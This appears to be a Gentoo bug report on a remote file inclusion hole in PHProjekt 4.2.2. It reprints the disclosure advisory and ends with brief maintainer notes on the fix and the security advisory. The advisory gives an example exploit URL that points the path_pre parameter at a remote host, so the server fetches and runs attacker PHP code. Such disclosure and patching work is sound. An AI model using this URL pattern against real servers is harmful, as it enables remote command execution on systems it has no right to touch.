The script authform.inc.php does not properly validate user input allowing a remote user to define the global variable $path_pre to cause the script to execute arbitrary PHP code from a remote server. This allows a remote user to execute operating system commands with the privileges of the target web server. Example Exploit: http://%s/%s/lib/authform.inc.php?path_pre=ht tp://%s/ Reproducible: Sometimes Steps to Reproduce: 1. Browsing to: http://%s/%s/lib/authform.inc.php?path_pre=http://%s/ 2. 3. Actual Results: The target server execute PHP code from the remote server. Expected Results: Not include remote PHP code by properly validating user supplied input Website: http://www.phprojekt.com/ Affected: PHProjekt Version: 4.2.2 Vulnerable file: authform.inc.php Discovered date: 2004-12-10 Disclosed date: 2004-12-27 Vendor notified: Yes Disclosed by: Phil C. (phil.c@cytechnet.com) Summary: The script authform.inc.php does not properly validate user input allowing a remote user to define the global variable $path_pre to cause the script to execute arbitrary PHP code from a remote server. This allows a remote user to execute operating system commands with the privileges of the target web server. Vendor Status: Fixed Current Version: 4.2.3 Patch: http://www.phprojekt.com/files/4.2/lib.zip
web-apps please provide an updated ebuild.
I'm looking at this now. Best regards, Stu
Fix committed, and marked stable on x86 and ppc. Best regards, Stu
GLSA 200412-27
